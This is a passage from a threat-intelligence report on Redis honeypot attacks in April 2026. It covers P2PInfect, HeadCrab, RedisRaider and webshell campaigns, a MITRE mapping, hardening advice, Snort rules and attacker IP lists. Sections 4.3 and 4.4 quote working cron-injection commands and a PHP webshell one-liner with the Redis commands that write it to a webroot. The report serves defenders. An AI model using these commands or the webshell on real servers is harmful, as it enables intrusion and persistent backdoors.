4. **C2 & Propagation:** Once loaded, the module provides the attacker with an interactive reverse shell (often hooking the `system.exec` command), allowing them to disconnect the replication (`SLAVEOF NO ONE`) and begin utilizing the host to scan for new victims [cite: 1, 2, 4].
The use of Rust provides P2PInfect with memory safety and cross-platform compilation ease, making static reverse engineering incredibly difficult due to the lack of standard C-library indicators [cite: 4].
### 4.2 HeadCrab and HeadCrab 2.0
Another highly prevalent threat targeting Redis is the **HeadCrab** botnet. Initially discovered by Aqua Security in early 2023, HeadCrab is a custom-made, state-of-the-art malware designed explicitly for Redis servers, primarily utilized for illicit Monero mining [cite: 3, 20].
**Behavioral Signatures & Evasion Tactics:**
Like P2PInfect, HeadCrab relies heavily on the `SLAVEOF` command to achieve initial synchronization with an attacker-controlled master [cite: 20, 21]. However, HeadCrab differentiates itself through extreme operational security (OPSEC) and stealth:
* **Fileless Persistence:** HeadCrab avoids writing binaries to the disk. It utilizes `memfd` (memory-only files) to load payloads, entirely bypassing traditional disk-based antivirus and Endpoint Detection and Response (EDR) scanning [cite: 3, 20, 21].
* **Log Wiping:** The malware actively hooks into the Redis module framework to scrub application logs, erasing evidence of the `MODULE LOAD` execution [cite: 3, 22].
* **HeadCrab 2.0 Evolution:** Telemetry analysis suggests an evolution in tactics. HeadCrab 2.0 has abandoned custom, highly visible command structures in favor of hijacking standard Redis communication channels. It uses the native `MGET` command, passing specially crafted strings as arguments, to establish covert C2 communications with the botnet [cite: 23, 24].
Because HeadCrab runs entirely within the context of the benign `redis-server` process, it is highly successful at avoiding behavioral heuristic flags [cite: 3].
### 4.3 RedisRaider
The dataset's evidence of malicious cron job creation points to the involvement of a newer, Go-based cryptojacking worm known as **RedisRaider**. Discovered by Datadog Security Research, RedisRaider aggressively scans the IPv4 space and utilizes Redis configuration commands to achieve persistence [cite: 5, 12].
**Behavioral Signatures & Obfuscation:**
While P2PInfect prefers memory modules, RedisRaider prefers filesystem manipulation. The malware uses the `CONFIG SET` command to alter the working directory to `/etc/cron.d/` or `/var/spool/cron/`. It then crafts a malicious database key containing a cron schedule and a Base64-encoded shell script, triggering a database save (`BGSAVE`) that writes the payload directly into the system's cron scheduler [cite: 5, 25].
* `config set dir /var/spool/cron/`
* `config set dbfilename root`
Once the cron job executes, it downloads the primary Go-based payload, dropping a heavily modified version of the XMRig miner [cite: 12, 26]. RedisRaider is notable for its defense evasion; it is compiled using Garble—a tool that scrambles symbols and encrypts strings to frustrate static analysis and reverse engineering [cite: 5, 27].
### 4.4 Webshell Deployment & Pterodactyl Panel Targeting
A highly specific and alarming malware vector observed in the telemetry involves the deployment of PHP webshells, specifically targeting infrastructure hosting web applications alongside Redis.
**The Pterodactyl Campaign:**
IP `146.70.199.232` (M247 Europe SRL) executed a distinct command chain:
`CONFIG SET dir /var/www/pterodactyl/public/, CONFIG SET dir /etc/cron.d, SET rce_payload "<?php if(isset($_GET['c'])){echo shell_exec($_GET['c']);} ?>"` [cite: 1, 28].
Pterodactyl is a popular, open-source game server management panel [cite: 6, 29]. By overwriting the public webroot (`/var/www/pterodactyl/public/`) with a PHP webshell, the attacker pivots from a database compromise to a full web-layer compromise. This allows them to bypass Redis entirely for future access, communicating directly with the webshell over standard HTTP/HTTPS (port 80/443), which is rarely blocked by edge firewalls. This method allows attackers to exploit known Pterodactyl vulnerabilities (such as CVE-2026-26016 or CVE-2026-21696) to steal panel credentials, access user databases, and hijack managed game servers [cite: 6, 30].
Similarly, IP `103.230.144.104` was observed writing a disguised PHP file (`.session-gc-ebnr6t.php`) into the standard `/var/www/html/` directory, achieving the same persistent backdoor access [cite: 1, 31].
## 5. Campaign Analysis
The April 2026 telemetry reveals that the Redis threat landscape is not monolithic; it is a highly competitive ecosystem where multiple threat actors run parallel campaigns, often fighting over the same vulnerable servers—a phenomenon referred to as "Cloud Resource Wars" [cite: 1].
### 5.1 Campaign A: The Decentralized Cryptojackers (P2PInfect & HeadCrab)
This campaign is defined by extreme technical sophistication and fileless execution. The operators behind P2PInfect and HeadCrab utilize decentralized peer-to-peer networks to distribute commands, making it nearly impossible to dismantle the C2 infrastructure via traditional IP blacklisting [cite: 3, 18]. Their primary goal is resource exhaustion—stealing CPU cycles to mine Monero. These malware families are highly territorial; upon infecting a Redis host, they routinely deploy scripts to search for and terminate competing mining processes (such as Kinsing or TeamTNT) and secure the Redis instance by disabling the `CONFIG` command to lock out rival hackers [cite: 1, 5].
### 5.2 Campaign B: The Initial Access Brokers (Webshell Droppers)
Distinct from the automated cryptominers, Campaign B focuses on establishing persistent, stealthy footholds for future exploitation. Characterized by the Pterodactyl and `/var/www/html/` PHP shell deployments, these actors act as Initial Access Brokers (IABs). Rather than immediately burning the compromised server's CPU on mining, they secure a quiet web-based backdoor [cite: 6, 32]. Access to these compromised web servers is often packaged and sold on dark web forums to higher-tier ransomware affiliates or data-extortion syndicates.
### 5.3 Campaign C: The "Spray and Pray" Botnets
Making up the bulk of the raw event volume, Campaign C involves massive, indiscriminate scanning originating from bulletproof hosts (Alsycon B.V.) and compromised cloud droplets (DigitalOcean). These actors utilize basic protocol fuzzing and SSH-bruteforce tools piped indiscriminately across all open ports. While lacking the sophistication of P2PInfect, their sheer volume guarantees they successfully compromise low-hanging fruit—instances completely lacking perimeter firewalls or running severely outdated software.
## 6. MITRE ATT&CK Mapping
The observed tactics, techniques, and procedures (TTPs) utilized by the adversaries in these campaigns map directly to the MITRE ATT&CK framework, providing a standardized language for defensive engineering.
| Tactic | Technique ID | Technique Name | Observation / Context |
| :--- | :--- | :--- | :--- |
| **Initial Access** | T1190 | Exploit Public-Facing Application | Automated scanning and exploitation of unauthenticated Redis instances on TCP 6379. |
| **Execution** | T1059.004 | Command and Scripting Interpreter: Unix Shell | Execution of bash/sh scripts dropped via cron jobs (RedisRaider). |
| **Execution** | T1106 | Native API | Abuse of native Redis APIs (`MODULE LOAD`, `SLAVEOF`, `CONFIG SET`) [cite: 2]. |
| **Persistence** | T1053.003 | Scheduled Task/Job: Cron | Modifying `dbfilename` to overwrite `/etc/cron.d` or `/var/spool/cron` to maintain access [cite: 1, 5]. |
| **Persistence** | T1505.003 | Server Software Component: Web Shell | Deploying PHP backdoors into `/var/www/html/` and Pterodactyl directories [cite: 6, 32]. |
| **Defense Evasion** | T1620 | Reflective Code Loading | Loading `exp.so` shared objects directly into process memory without touching the disk (P2PInfect) [cite: 4, 18]. |
| **Defense Evasion** | T1070 | Indicator Removal on Host | HeadCrab clearing Redis logs and utilizing `memfd` to mask footprints [cite: 3, 21]. |
| **Defense Evasion** | T1027 | Obfuscated Files or Information | RedisRaider utilizing the Garble obfuscator for Go binaries [cite: 5, 27]. |
| **Command and Control** | T1071.004 | Application Layer Protocol | HeadCrab 2.0 utilizing standard Redis `MGET` commands with crafted arguments to hide C2 traffic [cite: 21, 23]. |
| **Impact** | T1496 | Resource Hijacking | Utilization of compromised hardware to run XMRig and mine Monero (XMR) [cite: 12, 20]. |
## 7. Detection & Mitigation Strategies
The velocity of Redis exploitation dictates that post-compromise detection is often too late; an exposed server can be fully co-opted, backdoored, and weaponized within sixty seconds of appearing on public scanners [cite: 1]. Mitigation must focus heavily on network architecture and proactive configuration hardening.
### 7.1 Configuration & Architecture Hardening
1. **Network Segmentation:** Redis must **never** be exposed to the public internet (0.0.0.0). Bind the Redis service strictly to localhost (`bind 127.0.0.1`) or a secure, private VPC subnet [cite: 20].
2. **Enable Protected Mode:** Ensure `protected-mode yes` is enabled in `redis.conf`. This feature actively drops external connections if no password is set and no bind address is specified [cite: 20, 24].
3. **Authentication:** Implement strong passwords via the `requirepass` directive or utilize Redis ACLs (Access Control Lists) introduced in Redis 6.x to enforce principle-of-least-privilege.
4. **Command Renaming/Disabling:** To neutralize the primary vectors of attack (cron injection and module loading), administrators should rename or completely disable dangerous administrative commands in `redis.conf`:
* `rename-command CONFIG ""`
* `rename-command SLAVEOF ""`
* `rename-command MODULE ""`
* `rename-command DEBUG ""`
### 7.2 Detection Engineering (SIEM & EDR)
1. **File System Monitoring (FIM):** Utilize FIM tools (like Auditd or OSSEC) to generate high-priority alerts for *any* file modifications within `/var/spool/cron/`, `/etc/cron.d/`, or webroot directories (`/var/www/html/`) initiated by the `redis` service user [cite: 5].
2. **eBPF and Runtime Telemetry:** Because advanced malware like HeadCrab operates entirely in memory using `memfd`, traditional disk-based AV will fail. Utilize eBPF-based Cloud Native Detection and Response (CNDR) tools to monitor for unauthorized execution flows, anonymous memory mapping, or unauthorized outbound network connections originating from the Redis process [cite: 3, 24].
3. **Network Traffic Analysis (IDS/IPS):**
Deploy Suricata or Snort signatures to detect the plaintext transmission of malicious Redis commands over the wire.
**Example YARA/Snort Logic for Rogue Replication:**
```text
alert tcp $EXTERNAL_NET any -> $HOME_NET 6379 (msg:"NADSEC_Redis_SLAVEOF_Replication_Attempt"; flow:to_server,established; content:"SLAVEOF"; nocase; content:"MODULE LOAD"; nocase; classtype:attempted-admin; sid:1000001; rev:1;)
```
```text
alert tcp $EXTERNAL_NET any -> $HOME_NET 6379 (msg:"NADSEC_Redis_Cron_Injection"; flow:to_server,established; content:"CONFIG SET"; nocase; content:"dir"; nocase; content:"/etc/cron"; nocase; classtype:attempted-admin; sid:1000002; rev:1;)
```
## 8. IOC Appendix
The following represents a curated list of high-confidence Indicators of Compromise (IOCs) identified during the April 2026 telemetry analysis. Security operations teams are advised to implement perimeter blocks against the C2 and Malware Hosting infrastructure.
### 8.1 Critical Rogue Master & C2 Servers (Blocklist)
These IPs actively host the `exp.so` payloads or act as rogue replication masters.
* `128.199.146.217` (DigitalOcean, SG - `SLAVEOF` C2)
* `8.217.32.175` (Alibaba Cloud, CN - `SLAVEOF` C2)
* `47.95.124.226` (Alibaba Cloud, CN - `SLAVEOF` C2 / `exp.so` host)
* `185.202.223.90` (Contabo, DE - Payload host)
* `112.90.89.3` (Unknown - `SLAVEOF` C2)
### 8.2 Malware & Webshell Hosting Infrastructure
These IPs were observed actively dropping PHP scripts and webshell payloads.
* `103.230.144.104` (Gigabit Hosting Sdn Bhd, TW - PHP Webshell dropper)
* `146.70.199.232` (M247 Europe SRL, SG - Pterodactyl Panel exploiter)
### 8.3 High-Volume Malicious Scanners (Top Attackers)
These IPs generated excessive volumes of brute-force and exploit traffic.
* `194.50.16.198` (Alsycon B.V., NL - Bulletproof Scanner)
* `45.95.147.229` (Alsycon B.V., NL - Bulletproof Scanner)
* `160.119.76.60` (Alsycon B.V., SC - High-volume scanner)
* `165.154.235.116` (Scloud Pte Ltd, US - Automated RCE attempts)
* `124.156.169.223` (Tencent, HK - Module Load execution)
* `62.109.23.206` (JSC IOT, RU - Cron & Module Load execution)
* `39.108.228.106` (Alibaba, CN - Automated RCE attempts)
* `154.36.175.126` (NetLab Global, HK - Automated RCE attempts)
*(Note: IP addresses associated with transient cloud environments (AWS, Azure) have a high churn rate. Blocking the C2 and Bulletproof ASN infrastructure yields the highest long-term defensive value).*
## 9. Sources & Citations
* [cite: 1] NadSec Threat Intelligence. "March 2026 Redis Honeypot Analysis: Cloudzy with a Chance of RCE." *NadSec Online*, 2026.
* [cite: 7, 8] AbuseIPDB. "IP Information for 194.50.16.198 (Alsycon B.V.)." *AbuseIPDB Database*, 2026.
* [cite: 9] SCILabs. "Threat Profile: Red BerryMiner." *SCILabs Blog*, Dec 2023.
* [cite: 3, 20] Yaakov, N., & Eitani, A. "HeadCrab Attacks Servers Worldwide with Novel State-of-Art Redis Malware." *Aqua Security*, Feb 2023.
* [cite: 3, 21] Aqua Nautilus Research. "HeadCrab 2.0: Evolving Threat in Redis Malware Landscape." *Aqua Security*, Jan 2024.
* [cite: 23] The Hacker News. "New HeadCrab 2.0 Malware Uses Fileless Techniques to Target Redis Servers." *The Hacker News*, Feb 2024.
* [cite: 4] Cado Security Labs. "Self-replicating worm malware infects exposed Redis data store." *Neowin*, Jul 2023.
* [cite: 18] SOCRadar. "P2Pinfect: A Worm-Like Botnet Malware Targeting Redis Deployments." *SOCRadar Blog*, Aug 2023.
* [cite: 2] Mohnad-AL-saif. "Redis 4.x/5.x Unauthenticated Code Execution via Replication Abuse." *GitHub Repository*, 2025.
* [cite: 31, 33] IPInfo / Mitchell Krog. "IP Range 103.230.144.0/24 & Nginx Bad Bot Blocker List." *IPInfo / GitHub*, 2026.
* [cite: 14, 34] PlotIP / IPGeolocation. "IP Database Information for 128.199.146.217 and 165.154.235.116." *IP Geolocation Tools*, 2026.
* [cite: 6, 28] Ipregistry / GitHub Advisories. "M247 Europe SRL Subnet & Pterodactyl Panel Arbitrary Code Execution (CVE-2026-21696)." *GitHub / Ipregistry*, 2025-2026.
* [cite: 30] OpenCVE. "Pterodactyl Wings Control Plane Vulnerabilities (CVE-2026-21696, CVE-2026-26016)." *OpenCVE Database*, Apr 2026.
* [cite: 19] The Stack Technology. "P2Pinfect now able to deploy ransomware and crypto miner payloads." *The Stack*, Jun 2024.
* [cite: 32] National Security Agency (NSA) / CISA. "Detect and Prevent Web Shell Malware." *Cybersecurity Information Bulletin*, Jun 2020.
* [cite: 5, 12] Muir, M., & Baguelin, F. "RedisRaider: Weaponizing Misconfigured Redis." *Datadog Security Labs*, May 2025.
* [cite: 1, 13] Dataplane.org / NadSec Threat Intelligence. "SSH Auth Logs & P2PInfect Module Loading Mechanics." *Dataplane / NadSec*, 2026.
* [cite: 5, 27] Cyberpress / Datadog. "New RedisRaider Campaign Exploits Misconfigured Redis." *Cyberpress*, May 2025.
* [cite: 10, 11] BGP Tools / CSIRT. "AS49870 Network Policy & Vulnerability Summary (April 2024)." *BGP.tools / CSIRT Cyprus*, 2024.
* [cite: 29] Cybersecurity and Infrastructure Security Agency (CISA). "Vulnerability Summary for the Week of January 19, 2026 (SB26-026)." *CISA Bulletins*, Jan 2026.
**Sources:**
1. [nadsec.online](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEtYitoFiyN1VxUbRkYGW1k4Bg0ub_8lqPA6HFI7bGs9cZGQ0Jwq229Wq1g7g5NtOx1BwTCpfuIBYdKRZuzConw5FFs6bLFITG07-KV5ZLRGICXp6TgS5s3ueI2gng=)
2. [github.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGGmU30AOkfJ-O4vFo7lWiEjv7z8KokZnmx5ytq6yHWDvQed2CT29TadiP1E5ye6zDsBsn2GWyDf73l8-dbnTBs4D0m-okR81iBxldaU-LM84GSGxEfywIGwuirsm5DcE0q_ulsCcKEzRo-zcCLFBN4MJ_B5U8eKg6fwkFcEuZNXDJLpx_9GA==)
3. [aquasec.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFU26BdZPsTR4BHaK7wYibzTKeA055RoETyUWWs0UCg0G2Cu0nkwweE4X2bk1G_nYIUpk160evkcuvkTzd0DvNu8hL4DA4Sxb9aBZf4PQEFDWdMC3ydmBkjR4ZlHGeF0gHxjQfPIdXtFoy45hcttnIQfzJcK-mbiuHLUKsZ0ts7ahr_NssgODNaoJsaSp6GCYi9s2k0qkJHd0BMLPI=)
4. [neowin.net](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHu2Bo3BEByeagqNNIyoTgyPO7hRp8zWVeV8L8cWo3Z9dBX0bn9dWsE_ySb93Ersjw2NAAJbaP400lUxxMTyrsz3KX1wUrugzdSIZuVZjisfJQ56RwDNYnJmnYDYkAveE1mnxZ0AyVKNUd5k6INX9367ckRslL3cZIvlBVEIfnukzC9lDz4xJnnA7vTqiBznnl9VR3JGJgf8pKeDGfiVBPyGXD4dFnk6105)
5. [datadoghq.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEEC5RXfsg2JGLlxm35857NbAPjFbrLUojA4hH0tbFeDJjE9xAEXQT-Lg52OvPh9B0j4IOKYCgNqScl2GLL8ncIOWotV3ki_-eLyHq736KsOtdqKcWg3jlcWnA-cX4nrc1-ctHpBbMHtqB5oX-4a1zUV7YlJz5tfHjz6lye5Y3FKjFxg5o5J3n_o470DYLn)
6. [github.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFe-uoM6pXePz4J-T8u0v3FbrxewkHwuuxntyAdgpZ2L0je_ZC2hHprLyz8gwjFSNAg1I_c2Qn2bIW9qHzFzuDe64Fty0mb_iXo0gkPYA2dwp5SfJApO9NcKicE-fxY0H8cSAABjAgd)
7. [abuseipdb.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFNYQnuq1OmC-XiE893DgRdpaZjIRnSqOJSYXw2a16whZtc9Bc43i3Nt69QT4oxkbIwcFEpsehKiUeKR_sLjLFt4G-qLsCyaAtXpuUqGVwydolOX23_TLk4W7fftCD9UThxoA==)
8. [abuseipdb.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFHQvVIaxevo1B6ThqLH07tTBV1YwA8OLnnzjL_UDfgacH7QFaNDQsztNYbdL8qcOqfN0OqNxEdaJME3zipU0jZLIsiL0ghHot9S0BJzL3sjPtnAap9qA2lveSBaJ1RZnhnw2c=)
9. [scilabs.mx](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFSul88FnioBsqQXqT7gvXGB7QIdK1xaWfLklkZhW-jqOx1umnwWhQ63WYQMWDRj9UJzUOPXfd-igYABFOxRdujW1XzdnyphS05CYHW2cMBQYixtzdyMPc80-vQaA5RLls1vUzBwI8YsiLA5ty5KTqWnMNLL5wVsO-bPA==)
10. [bgp.tools](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHNwWMPWyk_RoESrI8q4mR7tBFolvxGsme7nX8wU-1u5uHkMsEajAV3CC-EffW_ithzZ4LVrVtc7V9tE_853dvxdhx2aa1z8wj1Cz7LrSaj7w==)
11. [cynet.ac.cy](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGvzGbM--4LlDDX0yql9Sz15pOXbK3Uj9NxJT3_aGdeyU7VN7ySVJ_vLgVZkDAB_HfjxCpKvf5XabIqxsvIt7deFrVFI4gRiKZuU42mHh-mjerrZw6h3_0Ur7IRIL6mq9pmJFipWi1hcD5o_MnXJQYpoQAj7_tYoJFmq-oJXcWp5hqn159ykKKbScw6MU1EAQukl_CgUiTb2c9uu5Q=)
12. [gbhackers.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFeerYnVSLwQGUyagxOUbGym1E0wmsSJFAoQt10mTmtaPPu2z4MPq3Y0HsLRCSEPu5tGZ5dtKPUUqcWfS4OMwmSyKyPZ1Rb6CgdFYBNu5mVFgaBqaAzJ0aw8rAPtPGBUva_k6OPnr-orZCeCzGVaA_O3V0KDDocwQ==)
13. [dataplane.org](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQErxNkEppwlSjsqBKGw_P5D4Zi00rthsgXkEIhKnAzPfQskLfuOuTykrA_MImrQ_Hs8knPt5FOzvFHyKkOLkUOvbPHFGn4fUWfV7vxxBKeO7Kn8RMuleWtOpg==)
14. [plotip.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHiB2RZXJ8yw3XmeOS_u_zuhM06Z7geLPFebJP1fJOhNQn7xmLNGfFRENHpUJZQxtqtCvinSWbda4E3SD4unv0Lh49qJ3r8_Ydl3uNFxa2GdZdqnBm1OIQ=)
15. [ntunhs.net](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGq49RfbNtvfX92YHbEMjQI3WuREb5YNd0vQk_4sQNIeWI3qGYzNfdwI5ft4bqD0_czieeqmxbhu5yox2w4dSOnaVdxvFPG4vyif88iCHRghhZ_GHzxxrQOL2Q6q1z0UQ==)
16. [ipinfo.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQESKTJdmo3lEtVyO617VAyKV3TclWpmQeuoSSYfn_rlR1FomyJo473Frr4mQdlsBslyvCwHG8uWPuWZdJWe3hHEKNZLyEck7veNY4ZtKzZBvbeUefnsXIjgw0o=)
17. [ipinfo.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQF5qrfWn1VSFduaNPttq1q1ATKqfG_yjUlmB9N4GaT5ENIk9gNzpZQLV9o24MwEtzFTa22GG5jsVpI4CVHAb2ctsp9T4_W4SC2dHlEdgv3hgwsAHUXRKR1JFcNI8A==)
18. [socradar.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFUfHPvSo6zNcwhsfvqbu_bB2SZ8FzV0XQitrq2Wds6z-F0RCqsHt_FWcQ9HeYhai-AciK8Z6I4uT2uwbH73-a6LT0wzowsf8AEmylFXwda9f082OYLCb_D-qxrhaBZDhjUv6HotmUg2UR9ceHfcNBWOJrCQNhsXyggPoKevJ8IK6drU-cZ_Xhku7ji3INdfAU=)
19. [thestack.technology](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHrQso54LF4A17HEFHAk5B70BO-ATSac0gMG5HxbzveM3OvLSIn0zw5sQs6ESTxQgW_s3vdYh-tKfwh46Ktrarz-R7n5eYVPF7RhNdpizEkqEXHpbZviwW34Zr9H7t0AkIb5UtKtITpKv-vJQNNmd94SbPRPQ==)
20. [heimdalsecurity.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGnMa1zleng7bFbHRSqRm06-dpfx4CcmgZIFhI18oZ5JG0lY6N_Q4LySRNwkToPRgObQpdQzotMOvy0ZUt_Uk-9Cy_jp6kC6-agMPAhB7wWHdcmjVTE14YmGsZ-Jx5XwAPzd2tjsosw-9JAA16Xc37ma4M8-JPvBmuR57xLy3pFeKQqe6h2nqU=)
21. [aquasec.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFY8c2c0dZMdotPV0A69ovGPYEmkEYOm1XmhaHmryac1Vtw1eAaIX24SQdEKwe-Bgu1e3C1J3ybpciII7yfiEmen1VDd93RgcYgKAjQnmsYtDQetkZbMIiVHyG1_sY6qO0fHHQ5n7ifJrNgpR8lpZF7fbEnrURi4KGbN-BfNjqIm50xhVt61nUUh1Xc)
22. [scworld.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFASNtKwBDWB5zHD9VZU0cyZp02ouDIiGLdIM_BD7YgCgUTIfVrDa6kZjRpvjzIkkXbvcKeuvHylYaAnDJytqII8UQsWAWUyNis2OQhzzhQca5ZU0hMxz9PuueQbFPD5CiwVXcifTPymwbRMcKwdPnwjWeR_U3pVjvyKgyAUcM5T9pN6YsKo9UdnL9n-yVpDbyhuAw_6h9KLhY=)
23. [thehackernews.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGa1g0jXMN34Y9nfACwhO-OlgOdqibGQHmJlJjVHE9TeckTsNgFXiHM6iRux64F56c_BDWreF8KYybQbd93jrxSiNz2mKjhxFNpMdR4Sf0dMmpK-DF-OSaAum61CAOxt1VL9XXuNxrnD987Sn8u_-cPEK--pxWwf4eWe2X-B912Xw==)
24. [aquasec.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFki7BJKdRTesulccRhhYYAjY7Gp6rmtdsNjrFRS44cWcP7P-V_ZBQFA1CbdqGYakKlNxUP9WWaLxZpjUMWeE4N3IX5eC6sbOqEa4-uZNAgKd2ll2c9Kgfs2calvYFXir9ZyhqyU4IRw6TiCS3_Fxh_mNtCAarviFBucXKyjdGhI6WZ8elryTNzDhn4acoF3OLX988Uix0HtY_gI4xFVWsQUfX-b2tn9KIfM-cjWfjTNs4N7Q==)
25. [thehackernews.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGU-LV0Tr32QPXOuVviL01JZzLGxTuJDcxhu9EtF-tKxAuC5Tj6Ux6mZvYWXi0DFi9-UkDch5ZFkP_V4ddujtX8DVa4_SIEQhxjFCYodcgXL5UPNy347M-07wg-CCopMbf40jML2qn14TeQazuMyhIiMt4as0FVUgD2qkzJ4ov_GuqCpDU=)
26. [esecurityplanet.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQH1jMX-4MEifzEOjU9sMLcGyzg4Tyc2ldSIE4-dbVWBsGKqk7OtBM-bcLvWn5iNuemqMk1e4I0_BQrydEV8oTs4RIxFbGLxGz2-O1s5Qsa1Ta-MlUBFHxQiEPsxGJPyWjH-BurONfX1wbOX4I8OVSF_KaceiQJYm1fGabUTJXmB)
27. [cyberpress.org](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQF6n_3Hh8QWi2LNq2cVm-xaHWnDnyyr3JBHBF8LTS5L1TsDDpWgK3wtCM5RuBhjst2h2O7J-iGwjneK7acY1YBJ5OjZQe9CFVFuN-Z4wULCJWU3dAw-_lB8k8eUOP34ZVf50PNTYpfQ9Xn8_9B_OcdktA3bFLm6QPPxObcFJHggRmMAIA==)
28. [ipinfo.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEcQ8dITJ9CvcNvrbeeK5MriM-l-wC0g3suvR35hnF-JiT3HoqctXlhWuUr552ouDzU2jDVsNxy_iG6wqPX6SCnON0z_F5QH_iancgjFKM18tiRicn5aW5RtWtu)
29. [cisa.gov](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGoFhsrhx8hePVa5gcBZdH9raVFKxxwnmASoctzbrCS73tTyzlZ37R62reY7JQti6qe8XmpTV3shKHFaXthKPqZqIMG-eejrGLi4GEEsDorXpalzpYvuZcCnlvgCAaqynj7umwBLlL8pP4=)
30. [opencve.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHGGg60GtMSPNMIyoH36WjmIsYwCu8M02CR6onqrjU77GJh233dQQIRnIeJq9pdicBAjTmx2l1oPS6GwGpqjDAl28iIJnVuLyJdA0HsE6m9MZk3Quc3FXUakjbXdrmK1_FEKMMy)
31. [ipinfo.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQH2s6Uks33zxTtouYhilegt5ikU5fdRTOKUGwQ-TQ_t5s1hl3Thb7IpGy2arnjJZwmGPuF4ppx9_1rxdvyPPnzuNgXsCQKwGJcfCKkko4rXRnJH6Ijoabg5dzoMhg==)
32. [defense.gov](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQF0jETdS9fJrTGhZheqXhwFTydnq0oBQfSVqpwm5iHkIyUNjk4YagcIHYJ9Vdcui4xjJBnHkJZZFnFSin9WOF1g_Tloq-rKaiKO91KfQxl_h_TuuA0xCTnaliYGpwKjvNm6kJ-i1I7-i3Ase-u6WWN_sJPfVXA2K5LWZ0HTJ6YL23vV4B9ybwuKCB3Zm6K2OV6PKDo4Kalc98FyJ-zvEMa_uCjfhA==)
33. [githubusercontent.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHcLfXKVyV6J44rAjyKLkE4Dl0KllHaCM-OMOJTTwxjgYuU_36I1xgaLZ9kQdqss7S5Zq1b-4XWAzOMxJ8CEuzmxmF0YDZ0rTajwkJ5lGfaBxgZZBLcK0B_6aIkwbaW_XTKeg_s7bQupG-nO8G53B5s1rkrRBBZ9NKi0LuN06GV0s6uOH6g5KLdn3_AAXt18jXZ7oNKf4McrKlo8f_Yt0LzsRmf-QPZ09k=)
34. [ipgeolocation.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEZJRiA79px-uTuWa7Bn6MsRS-sZoF4W4dXgF6zupwXuxY5-p93RtcTqxRoRu4oHrOqOau1K5FwswUBSNbuMl_JO04-Xwu2rQKVZJHxdGhOG_yU8q4W_zrx6zLGMW3n-LjTmrYeLgpoV2UFLg==)
STIX indicators
Filter, search, and copy indicators. Download the full STIX 2.1 bundle with GeoIP, ASN, threat scores, and MITRE ATT&CK mappings.
| Type | Value | Description | Labels | Valid from | |
|---|---|---|---|---|---|
| IPv4 | 118.212.121.21 | Attacker IP • Redis / seen in Redishoneypot; events=1; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0 | scanning_host | 2026-04-01 | |
| IPv4 | 216.218.206.114 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-04-01 | |
| IPv4 | 216.218.206.66 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-04-01 | |
| IPv4 | 223.199.181.58 | Attacker IP • Redis / seen in Redishoneypot; events=1; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0 | scanning_host | 2026-04-01 | |
| IPv4 | 223.223.179.212 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=CN; asn=4808; asn_org=China Unicom Beijing Province Network; redis_cmd_hits=0 | scanning_host | 2026-04-01 | |
| IPv4 | 8.140.234.215 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-01 | |
| IPv4 | 98.90.43.197 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-01 | |
| IPv4 | 100.50.17.159 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-01 | |
| IPv4 | 116.153.32.51 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0 | bruteforce | 2026-04-01 | |
